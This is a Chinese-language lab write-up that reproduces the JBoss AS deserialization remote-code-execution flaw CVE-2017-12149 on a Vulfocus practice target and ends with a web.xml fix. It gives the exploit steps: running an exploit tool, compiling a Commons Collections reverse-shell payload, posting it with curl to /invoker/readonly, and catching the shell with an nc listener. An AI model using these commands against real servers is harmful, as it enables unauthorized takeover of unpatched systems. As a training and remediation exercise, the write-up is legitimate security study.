CVE-2017-12149 复现及修复
漏洞名称:JBOOS AS 6.X 反序列化漏洞
CVE编号:CVE-2017-12149
漏洞等级:高危
影响版本:5.x和6.x版本
漏洞描述及原理:2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。但近期有安全研究者发现JBOSSAS 6.x也受该漏洞影响,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。
一.实验环境
软件 | 版本 |
---|---|
JBoss | V6.0Final |
jboss-_CVE-2017-12149 | (工具) |
二.实验环境
实验平台提供漏洞: VULFOCUS
攻击机:centos服务器
三.实验步骤
打开网址
我先是用御剑去扫了一下目录 发现这个目录 打开是500 所以一遍情况下存在漏洞
方法一 工具 jboss-_CVE-2017-12149
使用工具 jboss-_CVE-2017-12149
可以发现是root权限 所以 直接输入命令
find -name flag* 查询flag
方法二 反弹shell
首先去了解一下什么是 反弹shell
然后操作实验
操作:centos服务器
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port
//反弹shell的IP和端口
curl 漏洞ip/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
监听
nc -vlp 端口
获得shell 直接执行ls 查看目录
ls /tmp 找到flag
修复漏洞
首先进入/jboss/server/default/deploy/http-invoker.sar/invoker.war/WEB-INF/web.xml 目录
cd 靶机的根目录/jboss/server/default/deploy/http-invoker.sar/invoker.war/WEB-INF/web.xml
进行修改
<url-pattern>*</url-pattern> 在安全约束里添加修改
最后重启一下jboss服务 漏洞不再可以访问